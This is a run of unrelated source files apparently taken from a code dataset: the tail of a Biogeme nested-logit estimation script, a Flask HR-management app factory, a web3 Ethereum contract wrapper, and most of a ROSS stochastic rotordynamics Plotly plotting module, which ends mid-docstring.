second_stop_inbound*second_stop*first_bound+\
threeplus_stop_inbound*three_plus_stop*first_bound+\
first_stop_outbound*first_stop*second_bound+\
second_stop_outbound*second_stop*second_bound+\
threeplus_stop_outbound*three_plus_stop*second_bound+\
work_tour_dummy_Q*1*(tour_type==1)+\
edu_tour_dummy_Q*1*(tour_type==2)+\
shopping_tour_dummy_Q*1*(tour_type==3)+\
other_tour_dummy_Q*1*(tour_type==4)+\
first_tour_dummy_Q*first_tour_dummy+\
sub_tour_dummy_Q*has_subtour+zero_tour_remain_Q*1*(tour_remain==0)+\
one_tour_remain_Q*1*(tour_remain==1)+twoplus_tour_remain_Q*1*(tour_remain>=2)
V = {0:V_quit,1: V_work,2:V_edu,3:V_shopping,4:V_other}
av= {0:avail_quit,1:avail_workstop,2:avail_edustop,3:avail_shopstop,4:avail_otherstop}
nest_quit = MU1 , [0]
nest_nonquit = MU2 , [1,2,3,4]
nests=nest_quit,nest_nonquit
prob = nested(V,av,nests,stop_type)
#prob = bioLogit(V,av,stop_type)
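# Illustrative note (not from the original spec): under the usual Biogeme
# convention Beta(name, start, lower, upper, status), status=1 fixes a parameter,
# so MU1 and MU2 above are held at 1. With both nest scales fixed at 1 the
# structure nests = ((MU1, [0]), (MU2, [1, 2, 3, 4])) effectively collapses to a
# plain multinomial logit over the available alternatives:
# P(i) = av_i * exp(V_i) / sum_j av_j * exp(V_j)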
rowIterator('obsIter')
BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter')
exclude = ((avail_violation==1)+(origin_mtz==0)+(destination_mtz==0)+(time_window_h>=10)) > 0
BIOGEME_OBJECT.EXCLUDE = exclude
nullLoglikelihood(av,'obsIter')
choiceSet = [0,1,2,3,4]
cteLoglikelihood(choiceSet,stop_type,'obsIter')
availabilityStatistics(av,'obsIter')
BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP"
BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1"
BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "6" | 2.171875 | 2 |
HRMS/app/__init__.py | freestyletime/HumanResourceManagement | 1 | 3467 | # Initialization module
from config import Config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# Database access object
db = SQLAlchemy()
# Create the app
def create_app():
# Flask application object
app = Flask(__name__)
# Read and apply settings from the config file
app.config.from_object(Config)
# Initialize the database
db.init_app(app)
# Employee management subsystem
from app.view import employee
# Post (job position) management subsystem
from app.view import post
# Department management subsystem
from app.view import department
# Salary management subsystem
from app.view import salary
# Attendance management subsystem
from app.view import attendance
# Register the blueprints as the unified external interface
app.register_blueprint(employee)
app.register_blueprint(post)
app.register_blueprint(department)
app.register_blueprint(salary)
app.register_blueprint(attendance)
return app
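# Hedged usage sketch (the run module name and debug flag below are assumptions,
# not part of this project) showing how the factory above is typically wired up:
#
#     from app import create_app
#
#     app = create_app()
#
#     if __name__ == '__main__':
#         app.run(debug=True)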
| 2.703125 | 3 |
listener/src/ethereum_connection.py | NicolasMenendez/oracles-dashboard | 0 | 3468 | <filename>listener/src/ethereum_connection.py<gh_stars>0
import json
import web3
class EthereumConnection():
def __init__(self, url_node):
self._url_node = url_node
self._node_provider = web3.HTTPProvider(self._url_node)
self._w3 = web3.Web3(self._node_provider)
@property
def w3(self):
return self._w3
@property
def url_node(self):
return self._url_node
class ContractConnection():
def __init__(self, eth_conn, contract_address, abi_path):
self._eth_conn = eth_conn
self._contract_address = self._eth_conn.w3.toChecksumAddress(contract_address)
self._abi_path = abi_path
self.__json_abi = self.__open_abi()
self._contract = self._eth_conn.w3.eth.contract(
address=self._contract_address,
abi=self.__json_abi
)
def __open_abi(self):
return json.load(open(self._abi_path, "r"))
@property
def abi(self):
return self.__json_abi
@property
def contract(self):
return self._contract
@property
def address(self):
return self._contract_address
@property
def eth(self):
return self._contract.web3.eth
@property
def w3(self):
return self._eth_conn.w3
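# Hedged usage sketch (node URL, contract address and ABI path are made-up
# placeholders, not values taken from this project):
#
#     eth_conn = EthereumConnection("http://localhost:8545")
#     oracle = ContractConnection(
#         eth_conn,
#         "0x0000000000000000000000000000000000000000",
#         "abi/oracle.json",
#     )
#     print(oracle.address)
#     print(oracle.abi)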
| 2.5 | 2 |
ross/stochastic/st_results.py | JuliaMota/ross | 0 | 3469 | <reponame>JuliaMota/ross<filename>ross/stochastic/st_results.py<gh_stars>0
"""STOCHASTIC ROSS plotting module.
This module returns graphs for each type of analysis in st_rotor_assembly.py.
"""
import numpy as np
from plotly import express as px
from plotly import graph_objects as go
from plotly import io as pio
from plotly.subplots import make_subplots
from ross.plotly_theme import tableau_colors
pio.renderers.default = "browser"
# set Plotly palette of colors
colors1 = px.colors.qualitative.Dark24
colors2 = px.colors.qualitative.Light24
class ST_CampbellResults:
"""Store stochastic results and provide plots for Campbell Diagram.
It's possible to visualize multiple harmonics in a single plot to check
other speeds which also excite a specific natural frequency.
All plots are generated with Plotly.
Parameters
----------
speed_range : array
Array with the speed range in rad/s.
wd : array
Array with the damped natural frequencies
log_dec : array
Array with the Logarithmic decrement
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with diagrams for frequency and log dec.
"""
def __init__(self, speed_range, wd, log_dec):
self.speed_range = speed_range
self.wd = wd
self.log_dec = log_dec
def plot_nat_freq(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs):
"""Plot the damped natural frequencies vs frequency.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
harmonics: list, optional
List with the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for j, h in enumerate(harmonics):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=self.speed_range * h,
opacity=1.0,
name="{}x speed".format(h),
line=dict(width=3, color=colors1[j], dash="dashdot"),
legendgroup="speed{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"),
**kwargs,
)
)
for j in range(self.wd.shape[0]):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.wd[j], axis=1),
opacity=1.0,
name="Mean - Mode {}".format(j + 1),
line=dict(width=3, color=colors1[j]),
legendgroup="mean{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.wd[j], p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[j]),
name="percentile: {}%".format(p),
legendgroup="percentile{}{}".format(j, i),
hovertemplate=(
"Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.wd[j], 50 + p / 2, axis=1)
p2 = np.percentile(self.wd[j], 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[j]),
fill="toself",
fillcolor=colors1[j],
opacity=0.3,
name="confidence interval: {}% - Mode {}".format(p, j + 1),
legendgroup="conf{}{}".format(j, i),
hovertemplate=(
"Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"
),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Rotor speed</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Damped Natural Frequencies</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
width=1200,
height=900,
plot_bgcolor="white",
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_log_dec(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs):
"""Plot the log_dec vs frequency.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
harmonics: list, optional
List with the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for j in range(self.log_dec.shape[0]):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.log_dec[j], axis=1),
opacity=1.0,
name="Mean - Mode {}".format(j + 1),
line=dict(width=3, color=colors1[j]),
legendgroup="mean{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Log Dec: %{y:.3f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.log_dec[j], p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[j]),
name="percentile: {}%".format(p),
legendgroup="percentile{}{}".format(j, i),
hoverinfo="none",
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.log_dec[j], 50 + p / 2, axis=1)
p2 = np.percentile(self.log_dec[j], 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[j]),
fill="toself",
fillcolor=colors1[j],
opacity=0.3,
name="confidence interval: {}% - Mode {}".format(p, j + 1),
legendgroup="conf{}{}".format(j, i),
hoverinfo="none",
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Rotor speed</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Logarithmic decrement</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot(self, percentile=[], conf_interval=[], *args, **kwargs):
"""Plot Campbell Diagram.
This method plots Campbell Diagram.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
args: optional
harmonics : list, optional
List with the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with diagrams for frequency and log dec.
"""
fig0 = self.plot_nat_freq(percentile, conf_interval, *args, **kwargs)
default_values = dict(showlegend=False)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig1 = self.plot_log_dec(percentile, conf_interval, *args, **kwargs)
subplots = make_subplots(rows=1, cols=2)
for data in fig0["data"]:
subplots.add_trace(data, 1, 1)
for data in fig1["data"]:
subplots.add_trace(data, 1, 2)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1)
subplots.update_yaxes(fig1.layout.yaxis, row=1, col=1)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=2)
subplots.update_yaxes(fig1.layout.yaxis, row=1, col=2)
subplots.update_layout(
plot_bgcolor="white",
width=1800,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return subplots
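# Hedged usage sketch for ST_CampbellResults (the shapes are assumptions inferred
# from the plotting code above: speed_range is 1-D, while wd and log_dec are
# (n_modes, n_speeds, n_samples); in practice the stochastic rotor analysis builds
# this object rather than user code):
#
#     speeds = np.linspace(0, 500, 51)
#     wd = np.abs(np.random.rand(4, 51, 10)) * 100
#     log_dec = np.random.rand(4, 51, 10)
#     camp = ST_CampbellResults(speeds, wd, log_dec)
#     fig = camp.plot(conf_interval=[90], harmonics=[1, 2])
#     fig.show()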
class ST_FrequencyResponseResults:
"""Store stochastic results and provide plots for Frequency Response.
Parameters
----------
speed_range : array
Array with the speed range in rad/s.
magnitude : array
Array with the frequencies, magnitude (dB) of the frequency
response for each pair input/output.
phase : array
Array with the frequencies, phase of the frequency
response for each pair input/output.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
def __init__(self, speed_range, magnitude, phase):
self.speed_range = speed_range
self.magnitude = magnitude
self.phase = phase
def plot_magnitude(
self,
percentile=[],
conf_interval=[],
units="mic-pk-pk",
**kwargs,
):
"""Plot amplitude vs frequency.
This method plots the frequency response magnitude given an output and
an input using Plotly.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0% and 100% inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk".
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
if units == "m":
y_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
y_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
y_axis_label = "<b>Amplitude (dB)</b>"
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.magnitude, axis=1),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
legendgroup="mean",
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.magnitude, p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1)
p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Frequency</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text=y_axis_label,
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_phase(self, percentile=[], conf_interval=[], **kwargs):
"""Plot phase angle response.
This method plots the phase response given an output and an input
using Plotly.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.phase, axis=1),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
legendgroup="mean",
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.phase, p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.phase, 50 + p / 2, axis=1)
p2 = np.percentile(self.phase, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Frequency</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Phase Angle</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_polar_bode(
self,
percentile=[],
conf_interval=[],
units="mic-pk-pk",
**kwargs,
):
"""Plot polar forced response using Plotly.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
units : str, optional
Magnitude unit system.
Default is "mic-pk-pk".
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if units == "m":
r_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
r_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
r_axis_label = "<b>Amplitude (dB)</b>"
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatterpolar(
r=np.mean(self.magnitude, axis=1),
theta=np.mean(self.phase, axis=1),
customdata=self.speed_range,
thetaunit="radians",
line=dict(width=3.0, color="black"),
name="Mean",
legendgroup="mean",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatterpolar(
r=np.percentile(self.magnitude, p, axis=1),
theta=np.percentile(self.phase, p, axis=1),
customdata=self.speed_range,
thetaunit="radians",
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1)
p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1)
p3 = np.percentile(self.phase, 50 + p / 2, axis=1)
p4 = np.percentile(self.phase, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatterpolar(
r=np.concatenate((p1, p2[::-1])),
theta=np.concatenate((p3, p4[::-1])),
thetaunit="radians",
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
**kwargs,
)
)
fig.update_layout(
polar=dict(
radialaxis=dict(
title_text=r_axis_label,
title_font=dict(family="Arial", size=14),
gridcolor="lightgray",
exponentformat="power",
),
angularaxis=dict(
tickfont=dict(size=14),
gridcolor="lightgray",
linecolor="black",
linewidth=2.5,
),
),
)
return fig
def plot(self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs):
"""Plot frequency response.
This method plots the frequency and phase response given an output
and an input.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk"
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
fig0 = self.plot_magnitude(percentile, conf_interval, units, **kwargs)
default_values = dict(showlegend=False)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig1 = self.plot_phase(percentile, conf_interval, **kwargs)
fig2 = self.plot_polar_bode(percentile, conf_interval, units, **kwargs)
subplots = make_subplots(
rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]]
)
for data in fig0["data"]:
subplots.add_trace(data, row=1, col=1)
for data in fig1["data"]:
subplots.add_trace(data, row=2, col=1)
for data in fig2["data"]:
subplots.add_trace(data, row=1, col=2)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1)
subplots.update_yaxes(fig0.layout.yaxis, row=1, col=1)
subplots.update_xaxes(fig1.layout.xaxis, row=2, col=1)
subplots.update_yaxes(fig1.layout.yaxis, row=2, col=1)
subplots.update_layout(
plot_bgcolor="white",
polar_bgcolor="white",
width=1800,
height=900,
polar=dict(
radialaxis=fig2.layout.polar.radialaxis,
angularaxis=fig2.layout.polar.angularaxis,
),
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return subplots
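# Hedged usage sketch for ST_FrequencyResponseResults (shapes are assumptions read
# off the plotting code: magnitude and phase are (n_speeds, n_samples) arrays for a
# single input/output pair):
#
#     speeds = np.linspace(0, 500, 51)
#     mag = np.random.rand(51, 10) * 1e-5
#     phs = np.random.rand(51, 10) * np.pi
#     freq_resp = ST_FrequencyResponseResults(speeds, mag, phs)
#     fig = freq_resp.plot(conf_interval=[90])
#     fig.show()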
class ST_TimeResponseResults:
"""Store stochastic results and provide plots for Time Response and Orbit Response.
Parameters
----------
time_range : 1-dimensional array
Time array.
yout : array
System response.
xout : array
Time evolution of the state vector.
nodes_list: array
list with nodes from a rotor model.
nodes_pos: array
Rotor nodes axial positions.
number_dof : int
Number of degrees of freedom per shaft element's node
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
def __init__(self, time_range, yout, xout, number_dof, nodes_list, nodes_pos):
self.time_range = time_range
self.yout = yout
self.xout = xout
self.nodes_list = nodes_list
self.nodes_pos = nodes_pos
self.number_dof = number_dof
def plot_1d(
self, probe, percentile=[], conf_interval=[], fig=None, *args, **kwargs
):
"""Plot time response.
This method plots the time response given a tuple of probes with their nodes
and orientations.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
if fig is None:
fig = go.Figure()
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.yout[:, :, 0])
for j, y in enumerate(self.yout):
_probe_resp = operator @ np.vstack((y[:, dofx], y[:, dofy]))
probe_resp[j] = (
_probe_resp[0] * np.cos(angle) ** 2 +
_probe_resp[1] * np.sin(angle) ** 2
)
# fmt: on
fig.add_trace(
go.Scatter(
x=self.time_range,
y=np.mean(probe_resp, axis=0),
opacity=1.0,
name=f"Probe {i + 1} - Mean",
line=dict(width=3.0),
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.time_range,
y=np.percentile(probe_resp, p, axis=0),
opacity=0.6,
line=dict(width=2.5),
name=f"Probe {i + 1} - percentile: {p}%",
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
x = np.concatenate((self.time_range, self.time_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1),
fill="toself",
fillcolor=colors1[j],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
fig.update_xaxes(title_text="<b>Time (s)</b>")
fig.update_yaxes(title_text="<b>Amplitude</b>")
return fig
def plot_2d(self, node, percentile=[], conf_interval=[], fig=None, *args, **kwargs):
"""Plot orbit response (2D).
This function plots orbits for a given node on the rotor system in a 2D view.
Parameters
----------
node : int
Select the node to display the respective orbit response.
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
ndof = self.number_dof
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
if fig is None:
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=np.mean(self.yout[..., ndof * node], axis=0),
y=np.mean(self.yout[..., ndof * node + 1], axis=0),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=np.percentile(self.yout[..., ndof * node], p, axis=0),
y=np.percentile(self.yout[..., ndof * node + 1], p, axis=0),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.yout[..., ndof * node], 50 + p / 2, axis=0)
p2 = np.percentile(self.yout[..., ndof * node], 50 - p / 2, axis=0)
p3 = np.percentile(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0)
p4 = np.percentile(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=np.concatenate((p1, p2[::-1])),
y=np.concatenate((p3, p4[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
fig.update_xaxes(title_text="<b>Amplitude</b>")
fig.update_yaxes(title_text="<b>Amplitude</b>")
fig.update_layout(title="<b>Rotor Orbit: node {}</b>".format(node))
return fig
def plot_3d(self, percentile=[], conf_interval=[], fig=None, *args, **kwargs):
"""Plot orbit response (3D).
